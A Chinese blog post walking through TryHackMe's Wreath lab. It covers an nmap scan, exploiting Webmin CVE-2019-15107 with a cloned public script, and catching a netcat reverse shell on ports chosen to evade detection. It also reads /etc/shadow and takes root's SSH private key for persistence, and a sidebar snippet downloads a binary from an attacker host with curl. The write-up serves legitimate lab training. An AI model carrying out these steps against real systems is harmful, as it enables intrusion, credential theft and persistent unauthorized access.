tryhackme之Wreath-1.渗透测试基础案例之初步信息收集+打点

最新推荐文章于 2024-09-04 11:37:47 发布
最新推荐文章于 2024-09-04 11:37:47 发布
阅读量475 收藏
点赞数
分类专栏: web安全 tryhackme 文章标签: 安全 linux shell 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43200143/article/details/119712641
版权

前言:这是tryhackme的一大变化,出了一个系统的攻防的模拟环境,模拟前期打点,获取权限后,内网横向移动,以及最终打到个人PC等。这个系列文章正在更新。。

文章目录

1.初步信息收集+打点

给了一个工具包,推荐还是用最新的,密码是WreathNetwork

PS‼️

上传工具的话,别上传原始名字,改一下,比如工具名-你的昵称。因为大家是共用的这个环境。

Linux:Ctrl+T 可以把任务隐藏在后台,当前终端继续使用

故事背景:

多年不联系的老朋友Thomas Wreath突然给你打电话,问道,我听说你成为了黑客?很酷,我有一些服务器,你能获取他们的权限吗?

扫描,探测

老朋友给了我们一个ip 10.200.188.200

用nmap扫描一下,同时,最好保存扫描结果,这样不需要再次扫描

先扫描1-15000 并保存结果

-p1-15000

-oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式

nmap -p-15000 -vv TARGET_IP -oG initial-scan

在这里插入图片描述

开放端口如下:22、80、443、10000

获取操作系统

有的时候nmap扫描不出来,可以先和系统进行交互进行判断

从开发者工具中看服务器响应头能够看到,是centos

在这里插入图片描述

去访问这个网站,能够重定向到一个域名,但是访问失败,可能是它没设置dns

https://thomaswreath.thm/

我们可以手动设置dns

Linux: /etc/hosts

windows:C:\Windows\System32\drivers\etc\hosts

(需要管理员权限

在这里插入图片描述

下面就是仔细阅读页面上的内容,记录下来!

移动电话号码:

nmap -sV 获取版本信息

在这里插入图片描述

这个版本的服务有CVE漏洞,可以google搜一下

在这里插入图片描述

上面已经搜集到了漏洞,下面需要收集EXP

克隆exp

git clone https://github.com/MuirlandOracle/CVE-2019-15107

安装依赖

cd CVE-2019-15107 && pip3 install -r requirements.txt

添加执行权限

chmod +x ./CVE-2019-15107.py

不要轻易运行网上下的脚本,可执行程序等,可以先读一下

./CVE-2019-15107.py TARGET_IP

开始攻击!

在这里插入图片描述

whoami

root (不需要提权了

这个shell还不太行,可以手动再获取一个反弹shell,或者在这里输入shell就可以了

用nc获取反弹shell

nc -lvnp 9999

在这里插入图片描述

可以做一个tryhackme的shell房间,看看如何让shell更稳定以及它的类型

反弹shell的时候可以选443 80等,正常的应用端口逃避检测

进一步的攻击吧!

先看一下root用户的hash

在/etc/shadow里面

这个hash破解不了,但是可以通过其他途径一直控制服务器

ssh密钥!

/root/.ssh/id_rsa

下载下来,然后修改权限 chmod 600 KEY_NAME

用私钥链接

ssh root@ip -i 私钥文件

唐仔橙
关注
专栏目录
交际场合---英文单词
知识改变命运,ヾ(◍°∇°◍)ノ゙【求关注】
04-11 1067
加油。
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
Wreath_PenTest_Report:TryHackMe的花圈室记录
04-06
Wreath_PenTest_Report TryHackMe的花圈室记录
渗透测试之通过代码审计打点
zhangge3663的博客
10-27 871
文章来源: 酒仙桥六号部队 前言 代码审计(Code Audit)顾名思义就是通过阅读源代码,从中找出程序源代码中存在的 缺陷或安全隐患,提前发现并解决风险,这在甲方的SDL建设中是很重要的一环。而在渗透测试中,可以通过代码审计挖掘程序漏洞,快速利用漏洞进行攻击达成目标。 审计思路 常见的审计思路有: 1.寻找敏感功能点,通读功能点代码; 优点: 精准定向挖掘,利用程度高; 缺点:命名不规范的代码容易被忽略,导致失去先机。 2.根据敏感关键字回溯参数传递过程; 优...
信息收集,信息打点
m0_74120514的博客
05-26 802
信息收集基础
tryhackme之Wreath-3 渗透测试基础案例之内网渗透 继续进攻
qq_43200143的博客
08-15 417
文章目录3.继续进攻获得反弹shellcURL访问webshell先用webshell干点事在反弹shell前,先看一下它能否访问外网 方法也很多 3.继续进攻 往受害机器上上传nmap(静态编译好的) 可以开一个python的http服务 sudo python3 -m http.server 80 在受害机器上执行 curl ATTACKING_IP/nmap-USERNAME -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME
网络安全信息收集/打点技术
北冥同学的成长记录笔记
07-09 1557
《孙子兵法》中写道:知己知彼,百战不殆。信息收集是网络攻击或是渗透测试中的第一步,也是最关键的阶段,同时也是耗费时间最长的阶段。换句话说:渗透测试/网络攻击的本质就是信息收集
Wreath_PenTest_Report-源码.rar
10-10
【标题】"Wreath_PenTest_Report-源码.rar" 指的是一份关于网络安全渗透测试报告,源码部分可能包含了用于测试的安全工具、脚本或代码。渗透测试,也称为“白帽”黑客攻击,是通过模拟恶意黑客的攻击方式来评估...
2019高考英语词汇考查+题型练Unit2TheOlympicGames含解析新人新版必修2
08-06
在英语学习中,词汇是基础,这部分练习主要涉及到词汇的考查和应用,帮助学生巩固和提升对英语词汇的理解与运用。 在【部分内容】中,我们看到了一系列的语法填空题目,这些题目主要考察的是冠词的正确使用。冠词...
【Try Hack Me】内网专项---Wreath
人间体佐菲的博客
11-17 570
【Try Hack Me】内网专项---Wreath
渗透测试-信息打点(红队工具篇)
告白的博客
02-08 4442
0x00 介绍 finger项目(fofa&&350queke) 知道创宇:kunyu项目(zoomeye&&seebug) ARL灯塔项目:资产灯塔项目 自动化信息收集 Shuize水泽项目:全自动化信息收集 单点工具:子域名扫描,端口扫描… 0x01 Finger(fofa&&360quake) 项目地址:https://github.com/EASY233/Finger -u 对单个URL进行指纹识别 -f 对指定文件中的url进行批量指纹识别
渗透测试-信息收集打点基础篇)
告白的博客
02-08 1863
渗透测试-信息收集打点
新手必看 | 信息收集打点
最新发布
2301_80127209的博客
09-04 2700
本篇文章主要是汇总自己在以往的信息收集打点中的一些总结,然后给师傅们分享下个人信息打点的各种方式,以及使用工具的快、准、狠的重要性。让师傅们在后面的一些红队和众测包括src的项目中可以拿到一个不错的结果。
网络安全渗透测试里的打点是什么意思?
Y525698136的博客
07-19 1731
打点、踩点:信息收集以及漏洞确认阶段,一般指的是对测试/渗透目标进行信息收集,漏洞的确认。
渗透测试-信息打点与架构分析细节梳理
m0_74220316的博客
02-06 1582
使用React、Angular、Vue等前端框架进行页面构建。前端框架可以帮助组织和管理页面的结构,提高开发效率,同时提供更好的用户交互体验。使用Node.js、Django、Ruby on Rails等后端框架。后端框架用于处理业务逻辑、数据库交互和服务器端的功能,提供API供前端调用。使用MySQL作为关系型数据库,或者MongoDB作为非关系型数据库。数据库的选择取决于数据结构和访问模式,关系型数据库适用于复杂的关联数据,而非关系型数据库适用于文档型数据存储。
TryHackMe-Wreath [网络杀伤链](windows网络)渗透测试
M1n9K1n9的博客
02-19 2063
了解如何通过破坏面向公众的 Web 计算机并通过隧道传输流量以访问 Wreath 网络中的其他计算机来透视网络。
记录一次渗透测试艰难打点的过程
include_voidmain的博客
06-07 1538
记录一次渗透测试艰难打点的过程
渗透测试之常规外网打点拿下域控
zkaqlaoniao的博客
10-20 4771
目录 一、网络示意图 二、信息收集 2.0 netdiscover存活探测 2.1 端口扫描 2.2 美化NMAP扫描结果 2.3 目录扫描编写一个绕防火墙脚本 2.4 访问特殊状态码地址 三、对目标进行渗透测试 3.1测试Web服务器 四、内网渗透 4.1 对web 服务器的操作 4.2 对OA服务器进行渗透 4.3 对域控主机进行渗透 4.3.2 利用kiwi dcsync_ntml获取域管理员的ntml 4.4 使用CS渗透最后的域控 五、总结(有防护域控...
红队笔记之信息收集技术要点总结
明光札记
11-29 5104
信息收集技术解密
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值